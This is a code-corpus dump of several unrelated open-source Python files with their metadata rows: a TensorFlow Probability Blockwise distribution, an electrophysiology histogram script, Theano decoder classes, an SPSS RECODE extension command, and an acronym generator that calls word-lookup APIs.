x = tf.nest.pack_sequence_as(event_tensors, tf.split(x, splits, axis=-1))
def _reshape_part(part, dtype, event_shape):
part = tf.cast(part, dtype)
static_rank = tf.get_static_value(ps.rank_from_shape(event_shape))
if static_rank == 1:
return part
new_shape = ps.concat([ps.shape(part)[:-1], event_shape], axis=-1)
return tf.reshape(part, ps.cast(new_shape, tf.int32))
if all(
tensorshape_util.is_fully_defined(s)
for s in tf.nest.flatten(self._distribution.event_shape)):
x = tf.nest.map_structure(_reshape_part, x, self._distribution.dtype,
self._distribution.event_shape)
else:
x = tf.nest.map_structure(_reshape_part, x, self._distribution.dtype,
self._distribution.event_shape_tensor())
return x
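  # (Added note) _flatten_and_concat_event and _split_and_reshape_event are
  # inverses of each other: the first casts each component event to `self.dtype`
  # and concatenates along the last axis; the second splits that flat vector
  # back into per-component events with their original dtypes and event shapes.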
def _sample_n(self, n, seed=None):
return self._flatten_and_concat_event(
self._distribution.sample(n, seed=seed))
def _sample_and_log_prob(self, sample_shape, seed):
x, lp = self._distribution.experimental_sample_and_log_prob(
sample_shape, seed=seed)
return self._flatten_and_concat_event(x), lp
def _log_prob(self, x):
return self._distribution.log_prob(self._split_and_reshape_event(x))
def _entropy(self):
return self._distribution.entropy()
def _prob(self, x):
return self._distribution.prob(self._split_and_reshape_event(x))
def _mean(self):
return self._flatten_and_concat_event(self._distribution.mean())
def _default_event_space_bijector(self):
return self._distribution.experimental_default_event_space_bijector()
def _parameter_control_dependencies(self, is_init):
assertions = []
message = 'Distributions must have the same `batch_shape`'
if is_init:
batch_shapes = tf.nest.flatten(self._cached_batch_shape)
if all(tensorshape_util.is_fully_defined(b) for b in batch_shapes):
if batch_shapes[1:] != batch_shapes[:-1]:
raise ValueError('{}; found: {}.'.format(message, batch_shapes))
if not self.validate_args:
assert not assertions # Should never happen.
return []
if self.validate_args:
batch_shapes = self._cached_batch_shape
if not all(
tensorshape_util.is_fully_defined(s)
for s in tf.nest.flatten(batch_shapes)):
batch_shapes = tf.nest.map_structure(
lambda static_shape, shape_tensor: # pylint: disable=g-long-lambda
(static_shape if tensorshape_util.is_fully_defined(static_shape)
else shape_tensor), batch_shapes, self._cached_batch_shape_tensor)
batch_shapes = tf.nest.flatten(batch_shapes)
assertions.extend(
assert_util.assert_equal( # pylint: disable=g-complex-comprehension
b1,
b2,
message='{}.'.format(message))
for b1, b2 in zip(batch_shapes[1:], batch_shapes[:-1]))
assertions.extend(
assert_util.assert_equal( # pylint: disable=g-complex-comprehension
tf.size(b1),
tf.size(b2),
message='{}.'.format(message))
for b1, b2 in zip(batch_shapes[1:], batch_shapes[:-1]))
return assertions
def _sample_control_dependencies(self, x):
assertions = []
message = 'Input must have at least one dimension.'
if tensorshape_util.rank(x.shape) is not None:
if tensorshape_util.rank(x.shape) == 0:
raise ValueError(message)
elif self.validate_args:
assertions.append(assert_util.assert_rank_at_least(x, 1, message=message))
return assertions
@kullback_leibler.RegisterKL(Blockwise, Blockwise)
def _kl_blockwise_blockwise(b0, b1, name=None):
"""Calculate the batched KL divergence KL(b0 || b1) with b0 and b1 Blockwise distributions.
Args:
b0: instance of a Blockwise distribution object.
b1: instance of a Blockwise distribution object.
name: (optional) Name to use for created operations. Default is
"kl_blockwise_blockwise".
Returns:
kl_blockwise_blockwise: `Tensor`. The batchwise KL(b0 || b1).
"""
return b0._distribution.kl_divergence(b1._distribution, name=name) # pylint: disable=protected-access
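# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; not part of the original file).
# It relies only on the public `tfp.distributions` API: Blockwise concatenates
# the event dimensions of same-batch-shape, vector-variate distributions.
if __name__ == '__main__':  # pragma: no cover
  import tensorflow_probability as tfp
  tfd = tfp.distributions
  block = tfd.Blockwise([
      tfd.MultivariateNormalDiag(loc=[0., 0.]),   # event size 2
      tfd.Dirichlet(concentration=[1., 1., 1.]),  # event size 3
  ])
  x = block.sample(4)      # shape [4, 5]: the two events are concatenated
  lp = block.log_prob(x)   # shape [4]: sum of the component log-probs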
| apache-2.0 | 4,754,112,428,471,258,000 | 36.071429 | 104 | 0.648105 | false | 3.80964 | false | false | false |
swharden/SWHLab | doc/uses/EPSCs-and-IPSCs/smooth histogram method/05.py | 1 | 1812 | """
MOST OF THIS CODE IS NOT USED
ITS COPY/PASTED AND LEFT HERE FOR CONVENIENCE
"""
import os
import sys
# in case our module isn't installed (running from this folder)
if not os.path.abspath('../../../') in sys.path:
sys.path.append('../../../') # helps spyder get docs
import swhlab
import swhlab.common as cm
import matplotlib.pyplot as plt
import numpy as np
import warnings # suppress VisibleDeprecationWarning warning
warnings.filterwarnings("ignore", category=np.VisibleDeprecationWarning)
def analyzeSweep(abf,plotToo=True,color=None,label=None):
Y=abf.sweepYsmartbase()[abf.pointsPerSec*.5:]
AV,SD=np.average(Y),np.std(Y)
dev=5 # number of stdevs from the avg to set the range
R1,R2=[(AV-SD)*dev,(AV+SD)*dev]
nBins=1000
hist,bins=np.histogram(Y,bins=nBins,range=[R1,R2],density=True)
histSmooth=abf.convolve(hist,cm.kernel_gaussian(nBins/5))
if plotToo:
plt.plot(bins[1:],hist,'.',color=color,alpha=.2,ms=10)
plt.plot(bins[1:],histSmooth,'-',color=color,lw=5,alpha=.5,label=label)
return
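# (Added note) analyzeSweep plots, for the currently selected sweep, a normalized
# histogram of the baseline-subtracted trace plus a Gaussian-smoothed version of
# it; color/label let several sweeps be overlaid on the same axes (see below).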
if __name__=="__main__":
#abfFile=R"C:\Users\scott\Documents\important\demodata\abfs\16d07022.abf"
abfFile=R"X:\Data\2P01\2016\2016-09-01 PIR TGOT\16d07022.abf"
abf=swhlab.ABF(abfFile)
# prepare figure
plt.figure(figsize=(10,10))
plt.grid()
plt.title("smart baseline value distribution")
plt.xlabel(abf.units2)
plt.ylabel("normalized density")
# do the analysis
abf.kernel=abf.kernel_gaussian(sizeMS=500)
abf.setsweep(175)
analyzeSweep(abf,color='b',label="baseline")
abf.setsweep(200)
analyzeSweep(abf,color='g',label="TGOT")
abf.setsweep(375)
analyzeSweep(abf,color='y',label="washout")
# show figure
plt.legend()
plt.margins(0,.1)
plt.show()
print("DONE")
| mit | -1,441,784,876,486,513,400 | 28.225806 | 79 | 0.683223 | false | 2.936791 | false | false | false |
enalisnick/stick-breaking_dgms | models/variational_coders/decoders.py | 1 | 3064 | import numpy as np
import theano
import theano.tensor as T
### Regular Decoder
class Decoder(object):
def __init__(self, rng, input, latent_size, out_size, activation, W_z = None, b = None):
self.input = input
self.activation = activation
# setup the params
if W_z is None:
W_values = np.asarray(0.01 * rng.standard_normal(size=(latent_size, out_size)), dtype=theano.config.floatX)
W_z = theano.shared(value=W_values, name='W_hid_z')
if b is None:
b_values = np.zeros((out_size,), dtype=theano.config.floatX)
b = theano.shared(value=b_values, name='b')
self.W_z = W_z
self.b = b
self.pre_act_out = T.dot(self.input, self.W_z) + self.b
self.output = self.activation(self.pre_act_out)
# gather parameters
self.params = [self.W_z, self.b]
### Supervised Decoder
class Supervised_Decoder(Decoder):
def __init__(self, rng, input, labels, latent_size, label_size, out_size, activation, W_z = None, W_y = None, b = None):
self.labels = labels
# init parent class
super(Supervised_Decoder, self).__init__(rng=rng, input=input, latent_size=latent_size, out_size=out_size, activation=activation, W_z=W_z, b=b)
# setup the params
if W_y is None:
W_values = np.asarray(0.01 * rng.standard_normal(size=(label_size, out_size)), dtype=theano.config.floatX)
W_y = theano.shared(value=W_values, name='W_y')
self.W_y = W_y
self.output = self.activation( self.pre_act_out + T.dot(self.labels, self.W_y) )
# gather parameters
self.params += [self.W_y]
### Marginalized Decoder (for semi-supervised model)
class Marginalized_Decoder(Decoder):
def __init__(self, rng, input, batch_size, latent_size, label_size, out_size, activation, W_z, W_y, b):
# init parent class
super(Marginalized_Decoder, self).__init__(rng=rng, input=input, latent_size=latent_size, out_size=out_size, activation=activation, W_z=W_z, b=b)
# setup the params
self.W_y = W_y
# compute marginalized outputs
labels_tensor = T.extra_ops.repeat( T.shape_padaxis(T.eye(n=label_size, m=label_size), axis=0), repeats=batch_size, axis=0)
self.output = self.activation(T.extra_ops.repeat(T.shape_padaxis(T.dot(self.input, self.W_z), axis=1), repeats=label_size, axis=1) + T.dot(labels_tensor, self.W_y) + self.b)
# no params here since we'll grab them from the supervised decoder
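# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; not part of the original module).
# Shapes only: a Decoder maps a (batch, latent_size) code to (batch, out_size).
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    z = T.matrix('z')  # symbolic (batch, latent_size) input
    dec = Decoder(rng, z, latent_size=50, out_size=784, activation=T.nnet.sigmoid)
    decode = theano.function([z], dec.output)
    print(decode(np.zeros((8, 50), dtype=theano.config.floatX)).shape)  # (8, 784)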
| mit | 8,828,024,413,954,331,000 | 49.229508 | 181 | 0.520235 | false | 3.718447 | false | false | false |
IBMPredictiveAnalytics/SPSSINC_RECODEEX | src/SPSSINC_RECODEEX.py | 1 | 20980 |
#/***********************************************************************
# * Licensed Materials - Property of IBM
# *
# * IBM SPSS Products: Statistics Common
# *
# * (C) Copyright IBM Corp. 1989, 2020
# *
# * US Government Users Restricted Rights - Use, duplication or disclosure
# * restricted by GSA ADP Schedule Contract with IBM Corp.
# ************************************************************************/
import spss, spssaux
from spssaux import _smartquote
from spssaux import u
import spss, spssaux
from extension import Template, Syntax, processcmd
import locale, os, re, copy, codecs, string
__author__ = 'spss, JKP'
__version__= '1.1.0'
# history
# 04-jun-2010 original version
# 11-nov-2014 Allow input value labels in generated value labels
helptext = """SPSSINC RECODEEX
inputvarlist = outputvarlist
/RECODES "(input value(s) = recode) ... (else={COPY*|SYSMIS})"
[/OPTIONS [STRINGSIZE=n] [VALUELABELS={YES*|NO}] [COPYVARIABLELABELS={YES*|NO}]
[SUFFIX="value"] [PREFIX="value"]]
Recode variables into other variables with optional variable and value label generation.
Examples:
RECODEEX fatherage motherage = fatheragerc motheragerc
/RECODES "(LO THRU 50=1) (51 thru 75=2) (ELSE=COPY)"
/OPTIONS SUFFIX="rc".
RECODEEX bdate = bdaterc
/RECODES "(LO THRU 1950-12-31=1)(1951-01-01 THRU 1990-12-31=2)".
RECODEEX duration = durationrc
/RECODES "(LO THRU 10 12:00:00=1)(10 12:00:00 THRU HIGH=2)".
This command extends the built-in RECODE command in several ways.
- Date or time constants are used for variables of these types
- Value labels can be automatically generated for the outputs
- Variable labels can be copied
- Variable types can be changed for the output variables.
inputvarlist specifies the variables to be recoded. They must all have the same type
(numeric, string, a date format, or a time format).
MOYR, WKYR and WKDAY formats are not supported.
outputvarlist specifies an equal number of variables for the results. If STRINGSIZE is specified,
the output variables will all be made strings of that length. The type of any existing variables will be
changed to match if necessary. If STRINGSIZE is not specified, no variable types
will be changed, and any new variables will be numeric.
A variable cannot be used as both an input and output variable.
Recode specifications have the same general form as for the RECODE command:
(input-values = output-value)
See the RECODE command for details.
THE ENTIRE RECODE SPECIFICATION must be enclosed in quotes.
Input or output string values must also be quoted.
If the variables have a date format, recode values have the form yyyy-mm-dd.
If the values have a time format, recode values have the form hh:mm, hh:mm:ss.ss
or these forms preceded by days, e.g., 10 08:03.
VALUELABELS specifies whether value labels should be created for the output values.
They will consist of the input values that are mapped to each output with two caveats:
An else specification does not contribute to the labels.
If an input value is mapped to more than one output value, it will appear in each corresponding
value label even though the RECODE command processes from left to right.
If COPYVARIABLELABELS=YES, the variable label, if any, of each input variable
will be copied to the output variable. PREFIX and SUFFIX can specify text to be
prepended or appended to the label with a separating blank.
/HELP displays this help and does nothing else.
"""
# MOYR, WKYR and WKDAY formats are not supported
datefmts = set(["DATE", "ADATE", "EDATE", "JDATE", "SDATE", "QYR", "DATETIME"])
timefmts = set(["TIME", "DTIME"])
numfmts = set(["F", "N", "E"])
strfmts = set(["A", "AHEX"])
def Run(args):
"""Execute the SPSSINC RECODEEX extension command"""
# debugging
# makes debug apply only to the current thread
#try:
#import wingdbstub
#if wingdbstub.debugger != None:
#import time
#wingdbstub.debugger.StopDebug()
#time.sleep(2)
#wingdbstub.debugger.StartDebug()
#import thread
#wingdbstub.debugger.SetDebugThreads({thread.get_ident(): 1}, default_policy=0)
#except:
#pass
args = args[list(args.keys())[0]]
oobj = Syntax([
Template("", subc="", ktype="literal", var="varlist", islist=True),
Template("", subc="RECODES", ktype="literal", var="recodes", islist=True),
Template("STRINGSIZE", subc="OPTIONS", ktype="int", var="stringsize", vallist=[1, 32767]),
Template("VALUELABELS", subc="OPTIONS", ktype="bool", var="makevaluelabels"),
Template("USEINPUTVALLABELS", subc="OPTIONS", ktype="bool",
var="useinputvallabels"),
Template("COPYVARIABLELABELS", subc="OPTIONS", ktype="bool", var="copyvariablelabels"),
Template("SUFFIX", subc="OPTIONS", ktype="literal", var="suffix"),
Template("PREFIX", subc="OPTIONS", ktype="literal", var="prefix"),
Template("HELP", subc="", ktype="bool")])
#enable localization
global _
try:
_("---")
except:
def _(msg):
return msg
# A HELP subcommand overrides all else
if "HELP" in args:
#print helptext
helper()
else:
processcmd(oobj, args, recode)
def helper():
"""open html help in default browser window
The location is computed from the current module name"""
import webbrowser, os.path
path = os.path.splitext(__file__)[0]
helpspec = "file://" + path + os.path.sep + \
"markdown.html"
# webbrowser.open seems not to work well
browser = webbrowser.get()
if not browser.open_new(helpspec):
print(("Help file not found:" + helpspec))
try: #override
from extension import helper
except:
pass
def recode(varlist, recodes, stringsize=None, makevaluelabels=True, copyvariablelabels=True, useinputvallabels=False,
suffix="", prefix=""):
vardict = spssaux.VariableDict(caseless=True)
isutf8 = spss.PyInvokeSpss.IsUTF8mode()
ecutf8 = codecs.getencoder("utf_8")
inputlist, outputlist, vartype = parsevarlist(varlist, vardict)
if len(recodes) > 1:
raise ValueError(_("The RECODES subcommand must consist of a single, quoted specification"))
# recodespec is a list of textual recode syntax, one item per value set
# vldefs is a dictionary with keys the target values
# and values the input codes
# inputdict is a dictionary with keys the target values
# and values a list of the input codes
recodespec, vldefs, inputdict = parserecodes(recodes[0], vartype, stringsize)
valuelabelmessage = checklabelconsistency(inputlist, vardict)
if stringsize:
alter = []
create = []
for v in outputlist:
try:
if vardict[v].VariableType != stringsize:
alter.append(v)
except:
create.append(v)
if create:
spss.Submit("STRING %s (A%s)." % (" ".join(create), stringsize))
if alter:
spss.Submit("ALTER TYPE %s (A%s)" % (" ".join(alter), stringsize))
spss.Submit("""RECODE %s %s INTO %s.""" % (" ".join(inputlist), " ".join(recodespec), " ".join(outputlist)))
# generate variable labels if requested
if copyvariablelabels:
if prefix and not prefix.endswith(" "):
prefix = prefix + " "
if suffix and not suffix.startswith(" "):
suffix = " " + suffix
for vin, vout in zip(inputlist, outputlist):
spss.Submit("""VARIABLE LABEL %s %s.""" % \
(vout, _smartquote(prefix + vardict[vin].VariableLabel + suffix, True)))
# generate value labels if requested
# all values for given target are merged but else clause is omitted
# VALUE LABELS syntax quotes values regardless of variable type
# vldefs is a dictionary with keys of the output values and
# values a string listing the input values. If copying value labels
# the first input variable is used as the source.
if makevaluelabels:
if useinputvallabels:
vldefs = makevallabels(vldefs, inputdict,
vardict[inputlist[0]].ValueLabels, isutf8, ecutf8)
# ensure that copy as target does not generate a value label
copyset = set()
for target in vldefs:
if target.lower() == "copy":
copyset.add(target)
for c in copyset:
del(vldefs[c])
#spss.Submit(r"""VALUE LABELS %s %s.""" % (" ".join(outputlist), \
#" ".join([_smartquote(val, vartype == 2) + " " + _smartquote(label, True) for val, label in vldefs.items()])))
spss.Submit(r"""VALUE LABELS %s %s.""" % (" ".join(outputlist), \
" ".join([val + " " + _smartquote(label, True) for val, label in list(vldefs.items())])))
if valuelabelmessage:
print(valuelabelmessage)
def makevallabels(vldefs, inputlabels, valuelabels,
isutf8, ecutf8):
"""convert values to value labels where available up to length limit
    vldefs is a dictionary keyed by output (target) value; each value is a
    string listing the corresponding input values
    valuelabels is a dictionary of labels for the input values
    inputlabels is a dictionary mapping each target value to the list of
    input values that recode into it
"""
for target in vldefs:
labels = [valuelabels.get(val, val) for val in inputlabels[target]]
labels = ", ".join(labels)
vldefs[target] = (truncatestring(labels, isutf8, 120, ecutf8))
return vldefs
def truncatestring(name, unicodemode, maxlength, ecutf8):
"""Return a name truncated to no more than maxlength BYTES.
name is the candidate string
unicodemode identifies whether in Unicode mode or not
maxlength is the maximum byte count allowed. It must be a positive integer
ecutf8 is a utf-8 codec
If name is a (code page) string, truncation is straightforward. If it is Unicode utf-8,
the utf-8 byte representation must be used to figure this out but still truncate on a character
boundary."""
if not unicodemode:
if len(name) > maxlength:
name = name[:maxlength-3] + "..."
else:
newname = []
nnlen = 0
# In Unicode mode, length must be calculated in terms of utf-8 bytes
for c in name:
c8 = ecutf8(c)[0] # one character in utf-8
nnlen += len(c8)
if nnlen <= maxlength:
newname.append(c)
else:
newname = newname[:-4]
newname.append("...")
break
name = "".join(newname)
return name
def parsevarlist(varlist, vardict):
"""return input variable list, output variable list, and basic type
varlist is a list whose combined elements have the "var var var = var var var"
vardict is a variable dictionary
In return, type is coded as
1 = numeric
2 = string
3 = date
4 = time
type constraints are enforced here but no attempt is made to check output variable types"""
try:
sepindex = varlist.index("=")
inputv = varlist[:sepindex]
outputv = varlist[sepindex+1:]
except:
raise ValueError(_("Variable list must have the form inputvars = outputvars"))
if len(inputv) != len(outputv):
raise ValueError(_("The number of input and output variables differ"))
if set(inputv).intersection(set(outputv)):
raise ValueError(_("Input and Output variable lists must be distinct"))
fmts = [vardict[v].VariableFormat.rstrip("0123456789.") for v in inputv]
fmtypes = [f in numfmts and 1 or f in strfmts and 2 or f in datefmts and 3\
or f in timefmts and 4 for f in fmts or 0]
if len(set(fmtypes)) > 1:
raise ValueError(_("All input variables must have the same basic type"))
if fmtypes[0] == 0:
raise ValueError(_("Unsupported format type: %s") % fmts[0])
return inputv, outputv, fmtypes[0]
def parserecodes(recodes, vartype, stringsize):
"""Return list of recode specs for values
recodes is the text of the RECODES subcommand. Expected form is
(input values = outputvalue) ...
where input values could be a list of values, including THRU , HIGH, HIGHEST etc
For dates, expected form is yyyy-mm-dd
For times, expected form is hh:mm:ss.fraction where all parts after hh are optional
Else spec is returned as is (RECODE will check it)
vartype is 1 - 4 as above"""
# first, process out all ( and ) characters embedded inside a literal (only matters for string variables)
recodes = protected(recodes)
allmappings = re.findall(r"\(.+?\)", recodes) # find all parenthesized mappings
if not allmappings:
raise ValueError(_("The recode specification did not include any parenthesized specifications."))
recodespec = []
recodetargets = {}
inputlist = {}
for item in allmappings:
itemcopy = copy.copy(item)
if vartype == 3:
item, count = re.subn(r"\d+-\d+-\d+(\s+\d+:\d+(:[.0-9]+)*)*", yrmodamo, item) # convert date or date/time expressions
if count == 0:
raise ValueError(_("A date variable recode specification did not include a date value: %s") % item)
elif vartype == 2:
item = re.sub(r"\02", "(", item)
item = re.sub(r"\03", ")", item)
itemcopy = copy.copy(item)
elif vartype == 4:
item, count = re.subn(r"(\d+\s+)*\d+:\d+(:[0-9.]+)*", timemo, item)
if count == 0:
raise ValueError(_("A time variable recode specification did not include a time value: %s") % item)
recodespec.append(item)
parts = mapdef(itemcopy) # get input, target for recode target value
        if not parts[0].lower() == "else":   # ELSE may be written in any case
try:
recodetargets[parts[1]] = recodetargets[parts[1]] + "," + parts[0]
except: # new target value
recodetargets[parts[1]] = parts[0]
inputlist[parts[1]] = splitter(parts[0])
return recodespec, recodetargets, inputlist
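# Illustrative example (added): for a plain numeric recode (vartype == 1),
#   parserecodes('(LO THRU 50=1) (51 THRU 75=2)', 1, None)
# returns
#   ['(LO THRU 50=1)', '(51 THRU 75=2)'],
#   {'1': 'LO THRU 50', '2': '51 THRU 75'},
#   {'1': ['LO THRU 50'], '2': ['51 THRU 75']}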
# characters legal in recode spec keywords
# string.letters is affected by local setting so need to subset
letters = string.ascii_letters[:52]
def splitter(pplus):
"""split string according to SPSS Statistics rules and return as list
pplus is the string to split
If the recode spec contains RECODE keywords,
return the expression as a list of length 1"""
quo = None
pplus = list(pplus +" ")
i = 0
pplusout = []
recodekeyword = False
while i < len(pplus) -1:
ch = pplus[i]
if ch == quo:
if pplus[i+1] == quo:
i+=1
pplusout.append(ch)
else:
quo = None
else:
if ch in ['"', "'"]:
quo = ch
else:
pplusout.append(ch)
if quo and ch == " ":
#pplus[i] = "\a"
pplusout[-1] = "\a"
if not quo and ch in letters: # plain alphabetics
recodekeyword = True
i += 1
inputs = "".join(pplusout).split()
inputs = [item.replace("\a", " ") for item in inputs]
if recodekeyword:
inputs = [" ".join(inputs)] # Can't find a label for this
return inputs
def checklabelconsistency(varnames, vardict):
"""Print warning message if value labels for varnames are inconsistent
varnames is a list of variable names to check
vardict is a VariableDict object"""
if len(varnames) <= 1:
return
clashes = []
for i,var in enumerate(varnames):
vallabels = set([(k.lower(), v) for k, v in list(vardict[var].ValueLabels.items())])
if i == 0:
refset = copy.copy(vallabels)
else:
if refset and not vallabels.issubset(refset):
clashes.append(var)
if clashes:
        return _("""Warning: The following variables have value label sets inconsistent with the
first variable being recoded (%s). The coding may be inconsistent.
If generating labels from the input value labels, the labels from
the first input variable are used to label the output values
for all the output variables.
%s""") % (varnames[0], " ".join(clashes))
else:
return None
def mapdef(spec):
"""return target value and inputs as a duple
spec has form (inputs = target)"""
# can't simply look for = not surrounded by quotes because ('x'='y') is legit :-(
litranges = []
for ch in ["'", '"']: #single quote or double quote
pat = """%(ch)s[^%(ch)s]*%(ch)s""" % locals() # quote non-quote-of-same-type* quote
moit = re.finditer(pat, spec)
# for each literal found, replace ( and )
for m in moit:
litranges.append(m.span())
for i in range(len(spec), 0, -1):
pos = i-1
if spec[pos] == "=":
inlit = False
for r in litranges:
if r[0] <= pos < r[1]:
inlit = True
break
if inlit:
continue
return (spec[1:pos].strip(), spec[pos+1:-1].strip())
else:
raise ValueError(_("Invalid recode specification: %s") % spec)
# break expression into input and target separated by unquoted =
###return (parts[0][1:].strip(), parts[1][:-1].strip())
def protected(astr):
"""Return a string where all ( or ) characters embedded in quotes are converted to x02 or x03
astr is the text to search"""
# astr will always be pretty short in practice
for ch in ["'", '"']: #single quote or double quote
pat = """%(ch)s[^%(ch)s]*%(ch)s""" % locals() # quote non-quote-of-same-type* quote
moit = re.finditer(pat, astr)
# for each literal found, replace ( and )
for m in moit:
st, end = m.start(), m.end()
astr = astr[:st] + re.sub(r"\(", "\x02", astr[st:end]) + astr[end:]
astr = astr[:st] + re.sub(r"\)", "\x03", astr[st:end]) + astr[end:]
return astr
def yrmodamo(mo):
"""convert a date expression with an optional time portion to a number for recode
mo is the match object"""
# input like
#2005-03-31 or
#2005-03-31 8:30 or
#2005-03-31 8:30:05.2
parts = mo.group().split() # break up date and time portions on white space
date = parts[0].split("-")
timeseconds = 0.
dateval = yrmoda(date)
# time portion, if any. hours and minutes are required; seconds are optional.
if len(parts) ==2:
timeparts = parts[1].split(":") # either 2 or 3 parts
timeparts = [float(t) for t in timeparts]
        timeseconds = (timeparts[0] * 60. + timeparts[1]) * 60.
if len(timeparts) == 3:
timeseconds = timeseconds + timeparts[2]
return str(dateval + timeseconds)
def timemo(mo):
"""convert a time expression to a number for recode
mo is the match object"""
# input like
#d hh:mm
#d hh:mm:ss.ss
#hh:mm
#hh:mm:ss.ss
parts = mo.group().split() # days and time
# time portion
t = [float(v) for v in parts[-1].split(":")]
t0 = (t[0] * 60. + t[1]) * 60. # hours and minutes
if len(t) == 3:
t0 = t0 + t[2] # and seconds
if len(parts) == 2: # day portion?
t0 = t0 + float(parts[0]) * 86400.
return str(t0)
def _smartquote(s, quoteit=True, qchar='"'):
""" smartquote a string so that internal quotes are distinguished from surrounding
quotes for SPSS and return that string with the surrounding quotes. qchar is the
character to use for surrounding quotes.
if quoteit is True, s is a string that needs quoting; otherwise it does not
"""
if quoteit:
return qchar + s.replace(qchar, qchar+qchar) + qchar
else:
return s
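# Illustrative examples (added): internal quotes are doubled for SPSS syntax.
#   _smartquote('male') -> '"male"'
#   _smartquote('6" pipe') -> '"6"" pipe"'
#   _smartquote('123', quoteit=False) -> '123'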
def yrmoda(ymd):
"""compute SPSS internal date value from four digit year, month, and day.
ymd is a list of numbers in that order. The parts will be truncated to integers.
The result is equivalent to the SPSS subroutine yrmoda result converted to seconds"""
if len(ymd) != 3:
raise ValueError("date specification must have the form yyyy-mm-dd")
year = int(ymd[0])
month = int(ymd[1])
day = int(ymd[2])
if year < 1582 or month < 1 or month > 13 or day <0 or day > 31:
raise ValueError((_("Invalid date value: %d %d %d")) % (year, month, day))
yrmo = year * 365 + (year+3)//4 - (year+99)//100 + (year + 399)//400 \
+ 3055 *(month+2)//100 - 578192
if month > 2:
yrmo-= 2
if (year%4 == 0 and (year%100 != 0 or year%400 ==0)):
yrmo+= 1
return (yrmo + day) * 86400 #24 * 60 * 60
| apache-2.0 | 8,460,138,943,254,883,000 | 37.214936 | 129 | 0.614585 | false | 3.744423 | false | false | false |
Fireforge/AcronatorServer | acronization.py | 1 | 5783 | import json
import argparse
import random
import sys
import requests
BIGHUGELABS_API_KEY = 'f79909b74265ba8593daf87741f3c874'
buzzWords = ['alignment','bot', 'collusion', 'derivative', 'engagement', 'focus', 'gathering' ,'housing','liability','management','nomenclature','operation','procedure','reduction','strategic','technology','undertaking','vision','widget','yardbird']
forbiddenWords = ['who','what','when','where','why','were','am','and','there','their']
class AcronymLetter:
def __init__(self, letter, word_list):
self.letter = letter.upper()
self.words = word_list
def __str__(self):
outString = ''
for word in self.words:
if len(outString) == 0:
outString = self.letter + " - " + str(word)
else:
outString = outString + ", " + str(word)
return outString
class Word:
def __init__(self, word, priority):
self.word = word
self.priority = priority
def __str__(self):
return self.word + " : " + str(self.priority)
def acronym_finder(inputAcronym, inputGeneralKeywords, numOutputs=5, minWordLength=2):
# holds letter objects
acronym = []
inputError = False
if minWordLength < 2:
print('You dun goofed. Minimum word length must be greater than 1')
inputError = True
if numOutputs < 1:
print('WTF! How does it make sense to print any less than 1 output?')
inputError = True
if inputError:
sys.exit()
# Generate possible word names from the synonym API
for keyword in inputGeneralKeywords:
thesaurusList_url = "http://words.bighugelabs.com/api/2/" + BIGHUGELABS_API_KEY + "/" + keyword + "/json"
thesaurusResponse = requests.get(thesaurusList_url)
if thesaurusResponse.status_code == 200:
thesaurusJson = json.loads(thesaurusResponse.text)
# this is normal for some words.
elif thesaurusResponse.status_code == 404:
continue
else:
print("Shit: " + str(thesaurusResponse.status_code))
letters = []
for i, c in enumerate(inputAcronym):
letters.append(c)
distinctLetters = list(set(letters))
# Rank possible synonym words for each letter in the acronym
for letter in distinctLetters:
firstLetter = letter.lower()
wordList = []
if thesaurusResponse.status_code == 200:
for wordType in thesaurusJson.keys():
for meaningType in thesaurusJson[wordType].keys():
for word in thesaurusJson[wordType][meaningType]:
if word[0] == firstLetter and word.count(' ') == 0 and len(word) >= minWordLength:
for w in wordList:
if w.word == word:
priority = w.priority + 1
wordList.remove(w)
wordList.insert(0,Word(word,priority))
break
else:
wordList.append(Word(word,1))
randomWords_url = "http://api.wordnik.com:80/v4/words.json/search/" + firstLetter + "?caseSensitive=false&includePartOfSpeech=noun&minCorpusCount=5&maxCorpusCount=-1&minDictionaryCount=1&maxDictionaryCount=-1&minLength=" + str(minWordLength) + "&maxLength=-1&skip=0&limit=" + str(4 * minWordLength * minWordLength * minWordLength) + "&api_key=a2a73e7b926c924fad7001ca3111acd55af2ffabf50eb4ae5"
randomWordsResponse = requests.get(randomWords_url)
if randomWordsResponse.status_code == 200:
randomWordsJson = json.loads(randomWordsResponse.text)
for entry in randomWordsJson["searchResults"]:
word = entry["word"]
if word[0] == firstLetter and len(word) >= minWordLength and word.count(' ') == 0:
wordList.append(Word(word,0))
        wordList.sort(key=lambda word: word.priority, reverse=True)  # in place, highest priority first
acronym.append(AcronymLetter(firstLetter,wordList))
# Generate possible acronym results
winners = []
for x in range (0,numOutputs):
winner = ''
for i, c in enumerate(inputAcronym):
for letter in acronym:
if letter.letter == c:
try:
word = letter.words[0]
if len(winner) == 0:
winner = word.word
letter.words.remove(word)
else:
winner = winner + ' ' + word.word
letter.words.remove(word)
except IndexError:
print("Can't get all {} words".format(len(acronym)))
# Sanity Check if the winner is a valid acronym
#if len(winner.split(' ')) == len(acronym):
winners.append(winner)
return winners
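# Illustrative call (added; live access to the BigHugeLabs/Wordnik APIs assumed):
#   acronym_finder('nasa', ['space', 'rocket'], numOutputs=3, minWordLength=4)
# returns a list of up to 3 candidate expansions, one word per letter of 'nasa'.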
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='De-Generate Acronym')
parser.add_argument('acronym', metavar='ACR',help='the acronym')
parser.add_argument('--numOutputs', metavar='NOU',type=int, help='number of outputs', default=1)
parser.add_argument('--minLength', metavar='MIN',type=int, help='minimum length of words used', default=2)
parser.add_argument('keywords', metavar='KEY', nargs='+',help='some keywords')
args = parser.parse_args()
winner_list = acronym_finder(
inputAcronym=args.acronym,
numOutputs=args.numOutputs,
inputGeneralKeywords=args.keywords,
minWordLength=args.minLength)
print('\n'.join(winner_list))
# Test call
# print(acronym_finder('hello', ['world'], numOutputs=5))
| mit | 8,642,745,247,605,629,000 | 38.882759 | 402 | 0.582743 | false | 3.876005 | false | false | false |
overdev/easygl-0.1.0-alpha1 | easygl/display/window.py | 1 | 11847 | # !/usr/bin/python
# -*- coding: utf-8 -*-
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#
# The MIT License (MIT)
#
# Copyright (c) 2017 Jorge A. Gomes (jorgegomes83 at hotmail dot com)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
